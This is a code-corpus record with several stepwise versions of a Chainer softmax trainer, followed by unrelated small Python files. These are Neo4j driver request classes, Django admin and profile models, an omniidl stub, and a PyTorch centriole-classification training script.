"step-1": "<mask token>\n\n\nclass SoftMaxTrainer:\n\n def __init__(self, net):\n self.model = L.Classifier(net)\n\n def set_train_data(self, train_x, train_t, valid_x, valid_t, n_batch):\n train = tuple_dataset.TupleDataset(train_x, train_t)\n test = tuple_dataset.TupleDataset(valid_x, valid_t)\n self.train_iter = iterators.SerialIterator(train, n_batch)\n self.test_iter = iterators.SerialIterator(test, n_batch, repeat=\n False, shuffle=False)\n\n def set_trainer(self, out_dir, gpu, n_epoch, g_clip, opt_name, lr=None):\n if opt_name == 'Adam':\n opt = getattr(optimizers, opt_name)()\n else:\n opt = getattr(optimizers, opt_name)(lr)\n opt.setup(self.model)\n opt.add_hook(optimizer.GradientClipping(g_clip))\n updater = training.StandardUpdater(self.train_iter, opt, device=gpu)\n self.trainer = training.Trainer(updater, (n_epoch, 'epoch'), out=\n out_dir)\n self.trainer.extend(extensions.Evaluator(self.test_iter, self.model,\n device=gpu))\n self.trainer.extend(extensions.dump_graph('main/loss'))\n self.trainer.extend(extensions.snapshot(), trigger=(n_epoch, 'epoch'))\n self.trainer.extend(extensions.LogReport())\n self.trainer.extend(extensions.PlotReport(['main/loss',\n 'validation/main/loss'], 'epoch', file_name='loss.png'))\n self.trainer.extend(extensions.PlotReport(['main/accuracy',\n 'validation/main/accuracy'], 'epoch', file_name='accuracy.png'))\n self.trainer.extend(extensions.PrintReport(['epoch', 'main/loss',\n 'validation/main/loss', 'main/accuracy',\n 'validation/main/accuracy', 'elapsed_time']))\n self.trainer.extend(extensions.ProgressBar())\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass SoftMaxTrainer:\n\n def __init__(self, net):\n self.model = L.Classifier(net)\n\n def set_train_data(self, train_x, train_t, valid_x, valid_t, n_batch):\n train = tuple_dataset.TupleDataset(train_x, train_t)\n test = tuple_dataset.TupleDataset(valid_x, valid_t)\n self.train_iter = iterators.SerialIterator(train, n_batch)\n self.test_iter = iterators.SerialIterator(test, n_batch, repeat=\n False, shuffle=False)\n\n def set_trainer(self, out_dir, gpu, n_epoch, g_clip, opt_name, lr=None):\n if opt_name == 'Adam':\n opt = getattr(optimizers, opt_name)()\n else:\n opt = getattr(optimizers, opt_name)(lr)\n opt.setup(self.model)\n opt.add_hook(optimizer.GradientClipping(g_clip))\n updater = training.StandardUpdater(self.train_iter, opt, device=gpu)\n self.trainer = training.Trainer(updater, (n_epoch, 'epoch'), out=\n out_dir)\n self.trainer.extend(extensions.Evaluator(self.test_iter, self.model,\n device=gpu))\n self.trainer.extend(extensions.dump_graph('main/loss'))\n self.trainer.extend(extensions.snapshot(), trigger=(n_epoch, 'epoch'))\n self.trainer.extend(extensions.LogReport())\n self.trainer.extend(extensions.PlotReport(['main/loss',\n 'validation/main/loss'], 'epoch', file_name='loss.png'))\n self.trainer.extend(extensions.PlotReport(['main/accuracy',\n 'validation/main/accuracy'], 'epoch', file_name='accuracy.png'))\n self.trainer.extend(extensions.PrintReport(['epoch', 'main/loss',\n 'validation/main/loss', 'main/accuracy',\n 'validation/main/accuracy', 'elapsed_time']))\n self.trainer.extend(extensions.ProgressBar())\n\n def start(self):\n self.trainer.run()\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass SoftMaxTrainer:\n\n def __init__(self, net):\n self.model = L.Classifier(net)\n\n def set_train_data(self, train_x, train_t, valid_x, valid_t, n_batch):\n train = tuple_dataset.TupleDataset(train_x, train_t)\n test = tuple_dataset.TupleDataset(valid_x, valid_t)\n self.train_iter = iterators.SerialIterator(train, n_batch)\n self.test_iter = iterators.SerialIterator(test, n_batch, repeat=\n False, shuffle=False)\n\n def set_trainer(self, out_dir, gpu, n_epoch, g_clip, opt_name, lr=None):\n if opt_name == 'Adam':\n opt = getattr(optimizers, opt_name)()\n else:\n opt = getattr(optimizers, opt_name)(lr)\n opt.setup(self.model)\n opt.add_hook(optimizer.GradientClipping(g_clip))\n updater = training.StandardUpdater(self.train_iter, opt, device=gpu)\n self.trainer = training.Trainer(updater, (n_epoch, 'epoch'), out=\n out_dir)\n self.trainer.extend(extensions.Evaluator(self.test_iter, self.model,\n device=gpu))\n self.trainer.extend(extensions.dump_graph('main/loss'))\n self.trainer.extend(extensions.snapshot(), trigger=(n_epoch, 'epoch'))\n self.trainer.extend(extensions.LogReport())\n self.trainer.extend(extensions.PlotReport(['main/loss',\n 'validation/main/loss'], 'epoch', file_name='loss.png'))\n self.trainer.extend(extensions.PlotReport(['main/accuracy',\n 'validation/main/accuracy'], 'epoch', file_name='accuracy.png'))\n self.trainer.extend(extensions.PrintReport(['epoch', 'main/loss',\n 'validation/main/loss', 'main/accuracy',\n 'validation/main/accuracy', 'elapsed_time']))\n self.trainer.extend(extensions.ProgressBar())\n\n def start(self):\n self.trainer.run()\n\n def predict(self, x):\n pred = F.softmax(self.model.predictor(x, train=False))\n return pred.data\n",
"step-4": "import chainer.links as L\nimport chainer.functions as F\nfrom chainer import optimizer, optimizers, training, iterators\nfrom chainer.training import extensions\nfrom chainer.datasets import tuple_dataset\n\n\nclass SoftMaxTrainer:\n\n def __init__(self, net):\n self.model = L.Classifier(net)\n\n def set_train_data(self, train_x, train_t, valid_x, valid_t, n_batch):\n train = tuple_dataset.TupleDataset(train_x, train_t)\n test = tuple_dataset.TupleDataset(valid_x, valid_t)\n self.train_iter = iterators.SerialIterator(train, n_batch)\n self.test_iter = iterators.SerialIterator(test, n_batch, repeat=\n False, shuffle=False)\n\n def set_trainer(self, out_dir, gpu, n_epoch, g_clip, opt_name, lr=None):\n if opt_name == 'Adam':\n opt = getattr(optimizers, opt_name)()\n else:\n opt = getattr(optimizers, opt_name)(lr)\n opt.setup(self.model)\n opt.add_hook(optimizer.GradientClipping(g_clip))\n updater = training.StandardUpdater(self.train_iter, opt, device=gpu)\n self.trainer = training.Trainer(updater, (n_epoch, 'epoch'), out=\n out_dir)\n self.trainer.extend(extensions.Evaluator(self.test_iter, self.model,\n device=gpu))\n self.trainer.extend(extensions.dump_graph('main/loss'))\n self.trainer.extend(extensions.snapshot(), trigger=(n_epoch, 'epoch'))\n self.trainer.extend(extensions.LogReport())\n self.trainer.extend(extensions.PlotReport(['main/loss',\n 'validation/main/loss'], 'epoch', file_name='loss.png'))\n self.trainer.extend(extensions.PlotReport(['main/accuracy',\n 'validation/main/accuracy'], 'epoch', file_name='accuracy.png'))\n self.trainer.extend(extensions.PrintReport(['epoch', 'main/loss',\n 'validation/main/loss', 'main/accuracy',\n 'validation/main/accuracy', 'elapsed_time']))\n self.trainer.extend(extensions.ProgressBar())\n\n def start(self):\n self.trainer.run()\n\n def predict(self, x):\n pred = F.softmax(self.model.predictor(x, train=False))\n return pred.data\n",
"step-5": "# -*- coding: utf-8 -*-\n\nimport chainer.links as L\nimport chainer.functions as F\nfrom chainer import optimizer, optimizers, training, iterators\nfrom chainer.training import extensions\nfrom chainer.datasets import tuple_dataset\n\nclass SoftMaxTrainer():\n\n def __init__(self, net):\n self.model = L.Classifier(net)\n\n def set_train_data(self, train_x, train_t, valid_x, valid_t, n_batch):\n train = tuple_dataset.TupleDataset(train_x, train_t)\n test = tuple_dataset.TupleDataset(valid_x, valid_t)\n self.train_iter = iterators.SerialIterator(train, n_batch)\n self.test_iter = iterators.SerialIterator(test, n_batch, repeat=False, shuffle=False)\n\n def set_trainer(self, out_dir, gpu, n_epoch, g_clip, opt_name, lr=None):\n if opt_name == \"Adam\":\n opt = getattr(optimizers, opt_name)()\n else:\n opt = getattr(optimizers, opt_name)(lr)\n opt.setup(self.model)\n opt.add_hook(optimizer.GradientClipping(g_clip))\n\n updater = training.StandardUpdater(self.train_iter, opt, device=gpu)\n self.trainer = training.Trainer(updater, (n_epoch, 'epoch'), out=out_dir)\n self.trainer.extend(extensions.Evaluator(self.test_iter, self.model, device=gpu))\n self.trainer.extend(extensions.dump_graph('main/loss'))\n self.trainer.extend(extensions.snapshot(), trigger=(n_epoch, 'epoch'))\n self.trainer.extend(extensions.LogReport())\n self.trainer.extend(extensions.PlotReport(['main/loss', 'validation/main/loss'],\n 'epoch', file_name='loss.png'))\n self.trainer.extend(extensions.PlotReport(['main/accuracy', 'validation/main/accuracy'],\n 'epoch', file_name='accuracy.png'))\n self.trainer.extend(extensions.PrintReport(['epoch', 'main/loss', 'validation/main/loss',\n 'main/accuracy', 'validation/main/accuracy',\n 'elapsed_time']))\n self.trainer.extend(extensions.ProgressBar())\n\n def start(self):\n self.trainer.run()\n\n def predict(self, x):\n pred = F.softmax(self.model.predictor(x, train=False))\n return pred.data\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
"""
All requests will be sent to backend as:
{
name: <class name>,
data: {
<all instance variables>
}
}
"""
class NewDriver:
def __init__(self, uri, authToken):
self.uri = uri
self.authorizationToken = authToken
class DriverClose:
def __init__(self, driverId):
self.driverId = driverId
class NewSession:
def __init__(self, driverId, accessMode, bookmarks):
self.driverId = driverId
self.accessMode = accessMode
self.bookmarks = bookmarks
class SessionClose:
def __init__(self, sessionId):
self.sessionId = sessionId
"""
Response should be Result model or raised Error model
"""
class SessionRun:
def __init__(self, sessionId, cypher, params):
self.sessionId = sessionId
self.cypher = cypher
self.params = params
class SessionReadTransaction:
def __init__(self, sessionId):
self.sessionId = sessionId
"""
Indicates a positive intent from the client application to commit the retryable transaction
"""
class RetryablePositive:
def __init__(self, sessionId):
self.sessionId = sessionId
"""
Indicates a negative intent from the client application to commit the retryable transaction
"""
class RetryableNegative:
def __init__(self, sessionId, errorId=""):
self.sessionId = sessionId
self.errorId = errorId
class TransactionRun:
def __init__(self, txId, cypher, params):
self.txId = txId
self.cypher = cypher
self.params = params
"""
Response should be Record model, NullRecord to indicate last record or raised Error model if record
couldn't be retrieved.
"""
class ResultNext:
def __init__(self, resultId):
self.resultId = resultId
class AuthorizationToken:
def __init__(self, scheme="none", principal="", credentials="", realm="", ticket=""):
self.scheme=scheme
self.principal=principal
self.credentials=credentials
self.realm=realm
self.ticket=ticket
|
normal
|
{
"blob_id": "dfcb095b26a21ba0c8ccc2a2c664bcfab29b8351",
"index": 8214,
"step-1": "<mask token>\n\n\nclass SessionRun:\n\n def __init__(self, sessionId, cypher, params):\n self.sessionId = sessionId\n self.cypher = cypher\n self.params = params\n\n\nclass SessionReadTransaction:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass RetryablePositive:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass RetryableNegative:\n\n def __init__(self, sessionId, errorId=''):\n self.sessionId = sessionId\n self.errorId = errorId\n\n\nclass TransactionRun:\n\n def __init__(self, txId, cypher, params):\n self.txId = txId\n self.cypher = cypher\n self.params = params\n\n\n<mask token>\n\n\nclass ResultNext:\n\n def __init__(self, resultId):\n self.resultId = resultId\n\n\nclass AuthorizationToken:\n\n def __init__(self, scheme='none', principal='', credentials='', realm=\n '', ticket=''):\n self.scheme = scheme\n self.principal = principal\n self.credentials = credentials\n self.realm = realm\n self.ticket = ticket\n",
"step-2": "<mask token>\n\n\nclass SessionClose:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass SessionRun:\n\n def __init__(self, sessionId, cypher, params):\n self.sessionId = sessionId\n self.cypher = cypher\n self.params = params\n\n\nclass SessionReadTransaction:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass RetryablePositive:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass RetryableNegative:\n\n def __init__(self, sessionId, errorId=''):\n self.sessionId = sessionId\n self.errorId = errorId\n\n\nclass TransactionRun:\n\n def __init__(self, txId, cypher, params):\n self.txId = txId\n self.cypher = cypher\n self.params = params\n\n\n<mask token>\n\n\nclass ResultNext:\n\n def __init__(self, resultId):\n self.resultId = resultId\n\n\nclass AuthorizationToken:\n\n def __init__(self, scheme='none', principal='', credentials='', realm=\n '', ticket=''):\n self.scheme = scheme\n self.principal = principal\n self.credentials = credentials\n self.realm = realm\n self.ticket = ticket\n",
"step-3": "<mask token>\n\n\nclass NewSession:\n <mask token>\n\n\nclass SessionClose:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass SessionRun:\n\n def __init__(self, sessionId, cypher, params):\n self.sessionId = sessionId\n self.cypher = cypher\n self.params = params\n\n\nclass SessionReadTransaction:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass RetryablePositive:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass RetryableNegative:\n\n def __init__(self, sessionId, errorId=''):\n self.sessionId = sessionId\n self.errorId = errorId\n\n\nclass TransactionRun:\n\n def __init__(self, txId, cypher, params):\n self.txId = txId\n self.cypher = cypher\n self.params = params\n\n\n<mask token>\n\n\nclass ResultNext:\n\n def __init__(self, resultId):\n self.resultId = resultId\n\n\nclass AuthorizationToken:\n\n def __init__(self, scheme='none', principal='', credentials='', realm=\n '', ticket=''):\n self.scheme = scheme\n self.principal = principal\n self.credentials = credentials\n self.realm = realm\n self.ticket = ticket\n",
"step-4": "<mask token>\n\n\nclass DriverClose:\n <mask token>\n\n\nclass NewSession:\n\n def __init__(self, driverId, accessMode, bookmarks):\n self.driverId = driverId\n self.accessMode = accessMode\n self.bookmarks = bookmarks\n\n\nclass SessionClose:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass SessionRun:\n\n def __init__(self, sessionId, cypher, params):\n self.sessionId = sessionId\n self.cypher = cypher\n self.params = params\n\n\nclass SessionReadTransaction:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass RetryablePositive:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass RetryableNegative:\n\n def __init__(self, sessionId, errorId=''):\n self.sessionId = sessionId\n self.errorId = errorId\n\n\nclass TransactionRun:\n\n def __init__(self, txId, cypher, params):\n self.txId = txId\n self.cypher = cypher\n self.params = params\n\n\n<mask token>\n\n\nclass ResultNext:\n\n def __init__(self, resultId):\n self.resultId = resultId\n\n\nclass AuthorizationToken:\n\n def __init__(self, scheme='none', principal='', credentials='', realm=\n '', ticket=''):\n self.scheme = scheme\n self.principal = principal\n self.credentials = credentials\n self.realm = realm\n self.ticket = ticket\n",
"step-5": "\n\"\"\"\nAll requests will be sent to backend as:\n {\n name: <class name>,\n data: {\n <all instance variables>\n }\n }\n\"\"\"\n\nclass NewDriver:\n def __init__(self, uri, authToken):\n self.uri = uri\n self.authorizationToken = authToken\n\n\nclass DriverClose:\n def __init__(self, driverId):\n self.driverId = driverId\n\n\nclass NewSession:\n def __init__(self, driverId, accessMode, bookmarks):\n self.driverId = driverId\n self.accessMode = accessMode\n self.bookmarks = bookmarks\n\n\nclass SessionClose:\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n\"\"\"\nResponse should be Result model or raised Error model\n\"\"\"\nclass SessionRun:\n def __init__(self, sessionId, cypher, params):\n self.sessionId = sessionId\n self.cypher = cypher\n self.params = params\n\n\nclass SessionReadTransaction:\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n\"\"\"\nIndicates a positive intent from the client application to commit the retryable transaction\n\"\"\"\nclass RetryablePositive:\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n\"\"\"\nIndicates a negative intent from the client application to commit the retryable transaction\n\"\"\"\nclass RetryableNegative:\n def __init__(self, sessionId, errorId=\"\"):\n self.sessionId = sessionId\n self.errorId = errorId\n\n\nclass TransactionRun:\n def __init__(self, txId, cypher, params):\n self.txId = txId\n self.cypher = cypher\n self.params = params\n\n\n\"\"\"\nResponse should be Record model, NullRecord to indicate last record or raised Error model if record\ncouldn't be retrieved.\n\"\"\"\nclass ResultNext:\n def __init__(self, resultId):\n self.resultId = resultId\n\n\nclass AuthorizationToken:\n def __init__(self, scheme=\"none\", principal=\"\", credentials=\"\", realm=\"\", ticket=\"\"):\n self.scheme=scheme\n self.principal=principal\n self.credentials=credentials\n self.realm=realm\n self.ticket=ticket\n\n",
"step-ids": [
14,
16,
17,
19,
23
]
}
|
[
14,
16,
17,
19,
23
] |
from django.contrib import admin
from xchanger.models import Currency, Rates, UpdateInfo
class CurrencyAdmin(admin.ModelAdmin):
pass
class UpdAdmin(admin.ModelAdmin):
pass
class RatesAdmin(admin.ModelAdmin):
list_filter = ['c_code_id', 'upd_id']
admin.site.register(Currency, CurrencyAdmin)
admin.site.register(UpdateInfo, UpdAdmin)
admin.site.register(Rates, RatesAdmin)
|
normal
|
{
"blob_id": "20ccdd319bfbbb4f17e8518eb60d125112c05d8e",
"index": 6828,
"step-1": "<mask token>\n\n\nclass RatesAdmin(admin.ModelAdmin):\n list_filter = ['c_code_id', 'upd_id']\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass CurrencyAdmin(admin.ModelAdmin):\n pass\n\n\nclass UpdAdmin(admin.ModelAdmin):\n pass\n\n\nclass RatesAdmin(admin.ModelAdmin):\n list_filter = ['c_code_id', 'upd_id']\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass CurrencyAdmin(admin.ModelAdmin):\n pass\n\n\nclass UpdAdmin(admin.ModelAdmin):\n pass\n\n\nclass RatesAdmin(admin.ModelAdmin):\n list_filter = ['c_code_id', 'upd_id']\n\n\nadmin.site.register(Currency, CurrencyAdmin)\nadmin.site.register(UpdateInfo, UpdAdmin)\nadmin.site.register(Rates, RatesAdmin)\n",
"step-4": "from django.contrib import admin\nfrom xchanger.models import Currency, Rates, UpdateInfo\n\n\nclass CurrencyAdmin(admin.ModelAdmin):\n pass\n\n\nclass UpdAdmin(admin.ModelAdmin):\n pass\n\n\nclass RatesAdmin(admin.ModelAdmin):\n list_filter = ['c_code_id', 'upd_id']\n\n\nadmin.site.register(Currency, CurrencyAdmin)\nadmin.site.register(UpdateInfo, UpdAdmin)\nadmin.site.register(Rates, RatesAdmin)\n",
"step-5": null,
"step-ids": [
2,
4,
5,
6
]
}
|
[
2,
4,
5,
6
] |
# DO NOT EDIT THIS FILE!
#
# Python module managedElementManager generated by omniidl
import omniORB
omniORB.updateModule("managedElementManager")
# ** 1. Stub files contributing to this module
import managedElementManager_idl
# ** 2. Sub-modules
# ** 3. End
|
normal
|
{
"blob_id": "7727896d4e1b2b415c398b206f9fb7e228e6f26d",
"index": 8602,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nomniORB.updateModule('managedElementManager')\n<mask token>\n",
"step-3": "import omniORB\nomniORB.updateModule('managedElementManager')\nimport managedElementManager_idl\n",
"step-4": "# DO NOT EDIT THIS FILE!\n#\n# Python module managedElementManager generated by omniidl\n\nimport omniORB\nomniORB.updateModule(\"managedElementManager\")\n\n# ** 1. Stub files contributing to this module\nimport managedElementManager_idl\n\n# ** 2. Sub-modules\n\n# ** 3. End\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from django.db import models
from django.contrib.auth.models import User
from django.db.models.deletion import CASCADE
class Profile(models.Model):
user = models.OneToOneField(User, on_delete=CASCADE)
# portfolio = models.ManyToOneRel(User, on_delete=)
def __str__(self):
return f"{self.user.username} Profile"
|
normal
|
{
"blob_id": "51ff1181f0ddac3a8f7cbd9f9d2eedae29a6c559",
"index": 6654,
"step-1": "<mask token>\n\n\nclass Profile(models.Model):\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Profile(models.Model):\n <mask token>\n\n def __str__(self):\n return f'{self.user.username} Profile'\n",
"step-3": "<mask token>\n\n\nclass Profile(models.Model):\n user = models.OneToOneField(User, on_delete=CASCADE)\n\n def __str__(self):\n return f'{self.user.username} Profile'\n",
"step-4": "from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.db.models.deletion import CASCADE\n\n\nclass Profile(models.Model):\n user = models.OneToOneField(User, on_delete=CASCADE)\n\n def __str__(self):\n return f'{self.user.username} Profile'\n",
"step-5": "from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.db.models.deletion import CASCADE\n\n\n\nclass Profile(models.Model):\n user = models.OneToOneField(User, on_delete=CASCADE)\n # portfolio = models.ManyToOneRel(User, on_delete=)\n\n def __str__(self):\n return f\"{self.user.username} Profile\"",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
#!/g/kreshuk/lukoianov/miniconda3/envs/inferno/bin/python3
# BASIC IMPORTS
import argparse
import os
import subprocess
import sys
import numpy as np
# INTERNAL IMPORTS
from src.datasets import CentriollesDatasetOn, CentriollesDatasetBags, GENdataset
from src.utils import get_basic_transforms, log_info, get_resps_transforms
import src.implemented_models as impl_models
# INFERNO IMPORTS
import torch
from inferno.trainers.basic import Trainer
from torch.utils.data import DataLoader
from inferno.trainers.callbacks.logging.tensorboard import TensorboardLogger
from inferno.trainers.callbacks.scheduling import AutoLR
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Run learning of simple CNN implementation')
parser.add_argument('--model_name', type=str, default='', help='Name of the model from models dir')
parser.add_argument('--test', action='store_true', help='Test this model on simpler dataset')
parser.add_argument('--features', action='store_true', help='Representation of repsponces')
parser.add_argument('--mil', action='store_true', help='Continue learning on the bag lavel')
parser.add_argument('--id', type=str, default='default', help='Unique net id to save')
parser.add_argument('--img_size', type=int, default=60, help='Size of input images')
args = parser.parse_args()
log_info('Params: ' + str(args))
if args.mil:
train_tr, test_tr = get_resps_transforms(features=args.features)
if args.test:
train_ds = GENdataset(transform=train_tr, bags=False, crop=True)
test_ds = GENdataset(train=False, transform=test_tr, bags=False, crop=True)
log_info('Artificial MIL data is used')
else:
train_ds = CentriollesDatasetBags(transform=train_tr,
inp_size=512, bags=False, crop=True)
test_ds = CentriollesDatasetBags(train=False, transform=test_tr,
inp_size=512, bags=False, crop=True)
log_info('MIL dataset is used')
else:
train_tr, test_tr = get_basic_transforms()
if args.test:
train_ds = CentriollesDatasetOn(transform=train_tr,
pos_dir='dataset/mnist/1',
neg_dir='dataset/mnist/0', inp_size=args.img_size)
test_ds = CentriollesDatasetOn(transform=test_tr,
pos_dir='dataset/mnist/1',
neg_dir='dataset/mnist/0', inp_size=args.img_size, train=False)
log_info('Test bags dataset is used')
else:
train_ds = CentriollesDatasetOn(transform=train_tr,
pos_dir='dataset/artificial/train_pos/',
neg_dir='dataset/artificial/train_neg/',
inp_size=args.img_size, all_data=True)
test_ds = CentriollesDatasetOn(transform=test_tr,
pos_dir='dataset/artificial/test_pos/',
neg_dir='dataset/artificial/test_neg/',
inp_size=args.img_size, all_data=True)
log_info('ILC dataset is used')
train_dl = DataLoader(train_ds, batch_size=4, shuffle=True, num_workers=0)
test_dl = DataLoader(test_ds, batch_size=4, shuffle=True, num_workers=0)
log_info('Datasets are initialized!')
# DIRS AND MODEL
exec("model = impl_models.%s" % (args.model_name))
model_dir = os.path.join('models', args.model_name)
curent_model_dir = os.path.join(model_dir, args.id)
log_info('Model will be saved to %s' % (curent_model_dir))
log_info(' + Number of params: {}'.format(sum([p.data.nelement() for p in model.parameters()])))
weight_dir = os.path.join(curent_model_dir, 'weights')
log_info('Weights will be saved to %s' % (weight_dir))
if not os.path.exists(weight_dir):
os.mkdir(weight_dir)
logs_dir = os.path.join(curent_model_dir, 'logs')
if not os.path.exists(logs_dir):
os.mkdir(logs_dir)
log_info('Logs will be saved to %s' % (logs_dir))
# Build trainer
logger = TensorboardLogger(log_scalars_every=(1, 'iteration'),
log_images_every=(np.inf, 'epochs'))
def log_histogram(self, tag, values, bins=1000):
pass
logger.log_histogram = log_histogram
trainer = Trainer(model)\
.build_criterion('CrossEntropyLoss') \
.build_metric('CategoricalError') \
.build_optimizer('Adam') \
.validate_every((2, 'epochs')) \
.save_every((5, 'epochs')) \
.save_to_directory(weight_dir) \
.set_max_num_epochs(10000) \
.build_logger(logger, log_directory=logs_dir) \
.register_callback(AutoLR(0.96, (1, 'epochs'), monitor_momentum=0.9,
monitor_while='validating',
consider_improvement_with_respect_to='best'))
# Bind loaders
trainer \
.bind_loader('train', train_dl) \
.bind_loader('validate', test_dl)
if torch.cuda.is_available():
trainer.cuda()
trainer.fit()
|
normal
|
{
"blob_id": "604c94e50b1fb9b5e451c4432113498410a4ac1f",
"index": 5262,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\n 'Run learning of simple CNN implementation')\n parser.add_argument('--model_name', type=str, default='', help=\n 'Name of the model from models dir')\n parser.add_argument('--test', action='store_true', help=\n 'Test this model on simpler dataset')\n parser.add_argument('--features', action='store_true', help=\n 'Representation of repsponces')\n parser.add_argument('--mil', action='store_true', help=\n 'Continue learning on the bag lavel')\n parser.add_argument('--id', type=str, default='default', help=\n 'Unique net id to save')\n parser.add_argument('--img_size', type=int, default=60, help=\n 'Size of input images')\n args = parser.parse_args()\n log_info('Params: ' + str(args))\n if args.mil:\n train_tr, test_tr = get_resps_transforms(features=args.features)\n if args.test:\n train_ds = GENdataset(transform=train_tr, bags=False, crop=True)\n test_ds = GENdataset(train=False, transform=test_tr, bags=False,\n crop=True)\n log_info('Artificial MIL data is used')\n else:\n train_ds = CentriollesDatasetBags(transform=train_tr, inp_size=\n 512, bags=False, crop=True)\n test_ds = CentriollesDatasetBags(train=False, transform=test_tr,\n inp_size=512, bags=False, crop=True)\n log_info('MIL dataset is used')\n else:\n train_tr, test_tr = get_basic_transforms()\n if args.test:\n train_ds = CentriollesDatasetOn(transform=train_tr, pos_dir=\n 'dataset/mnist/1', neg_dir='dataset/mnist/0', inp_size=args\n .img_size)\n test_ds = CentriollesDatasetOn(transform=test_tr, pos_dir=\n 'dataset/mnist/1', neg_dir='dataset/mnist/0', inp_size=args\n .img_size, train=False)\n log_info('Test bags dataset is used')\n else:\n train_ds = CentriollesDatasetOn(transform=train_tr, pos_dir=\n 'dataset/artificial/train_pos/', neg_dir=\n 'dataset/artificial/train_neg/', inp_size=args.img_size,\n all_data=True)\n test_ds = CentriollesDatasetOn(transform=test_tr, pos_dir=\n 'dataset/artificial/test_pos/', neg_dir=\n 'dataset/artificial/test_neg/', inp_size=args.img_size,\n all_data=True)\n log_info('ILC dataset is used')\n train_dl = DataLoader(train_ds, batch_size=4, shuffle=True, num_workers=0)\n test_dl = DataLoader(test_ds, batch_size=4, shuffle=True, num_workers=0)\n log_info('Datasets are initialized!')\n exec('model = impl_models.%s' % args.model_name)\n model_dir = os.path.join('models', args.model_name)\n curent_model_dir = os.path.join(model_dir, args.id)\n log_info('Model will be saved to %s' % curent_model_dir)\n log_info(' + Number of params: {}'.format(sum([p.data.nelement() for p in\n model.parameters()])))\n weight_dir = os.path.join(curent_model_dir, 'weights')\n log_info('Weights will be saved to %s' % weight_dir)\n if not os.path.exists(weight_dir):\n os.mkdir(weight_dir)\n logs_dir = os.path.join(curent_model_dir, 'logs')\n if not os.path.exists(logs_dir):\n os.mkdir(logs_dir)\n log_info('Logs will be saved to %s' % logs_dir)\n logger = TensorboardLogger(log_scalars_every=(1, 'iteration'),\n log_images_every=(np.inf, 'epochs'))\n\n def log_histogram(self, tag, values, bins=1000):\n pass\n logger.log_histogram = log_histogram\n trainer = Trainer(model).build_criterion('CrossEntropyLoss').build_metric(\n 'CategoricalError').build_optimizer('Adam').validate_every((2,\n 'epochs')).save_every((5, 'epochs')).save_to_directory(weight_dir\n ).set_max_num_epochs(10000).build_logger(logger, log_directory=logs_dir\n ).register_callback(AutoLR(0.96, (1, 'epochs'), monitor_momentum=\n 0.9, monitor_while='validating',\n consider_improvement_with_respect_to='best'))\n trainer.bind_loader('train', train_dl).bind_loader('validate', test_dl)\n if torch.cuda.is_available():\n trainer.cuda()\n trainer.fit()\n",
"step-3": "import argparse\nimport os\nimport subprocess\nimport sys\nimport numpy as np\nfrom src.datasets import CentriollesDatasetOn, CentriollesDatasetBags, GENdataset\nfrom src.utils import get_basic_transforms, log_info, get_resps_transforms\nimport src.implemented_models as impl_models\nimport torch\nfrom inferno.trainers.basic import Trainer\nfrom torch.utils.data import DataLoader\nfrom inferno.trainers.callbacks.logging.tensorboard import TensorboardLogger\nfrom inferno.trainers.callbacks.scheduling import AutoLR\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\n 'Run learning of simple CNN implementation')\n parser.add_argument('--model_name', type=str, default='', help=\n 'Name of the model from models dir')\n parser.add_argument('--test', action='store_true', help=\n 'Test this model on simpler dataset')\n parser.add_argument('--features', action='store_true', help=\n 'Representation of repsponces')\n parser.add_argument('--mil', action='store_true', help=\n 'Continue learning on the bag lavel')\n parser.add_argument('--id', type=str, default='default', help=\n 'Unique net id to save')\n parser.add_argument('--img_size', type=int, default=60, help=\n 'Size of input images')\n args = parser.parse_args()\n log_info('Params: ' + str(args))\n if args.mil:\n train_tr, test_tr = get_resps_transforms(features=args.features)\n if args.test:\n train_ds = GENdataset(transform=train_tr, bags=False, crop=True)\n test_ds = GENdataset(train=False, transform=test_tr, bags=False,\n crop=True)\n log_info('Artificial MIL data is used')\n else:\n train_ds = CentriollesDatasetBags(transform=train_tr, inp_size=\n 512, bags=False, crop=True)\n test_ds = CentriollesDatasetBags(train=False, transform=test_tr,\n inp_size=512, bags=False, crop=True)\n log_info('MIL dataset is used')\n else:\n train_tr, test_tr = get_basic_transforms()\n if args.test:\n train_ds = CentriollesDatasetOn(transform=train_tr, pos_dir=\n 'dataset/mnist/1', neg_dir='dataset/mnist/0', inp_size=args\n .img_size)\n test_ds = CentriollesDatasetOn(transform=test_tr, pos_dir=\n 'dataset/mnist/1', neg_dir='dataset/mnist/0', inp_size=args\n .img_size, train=False)\n 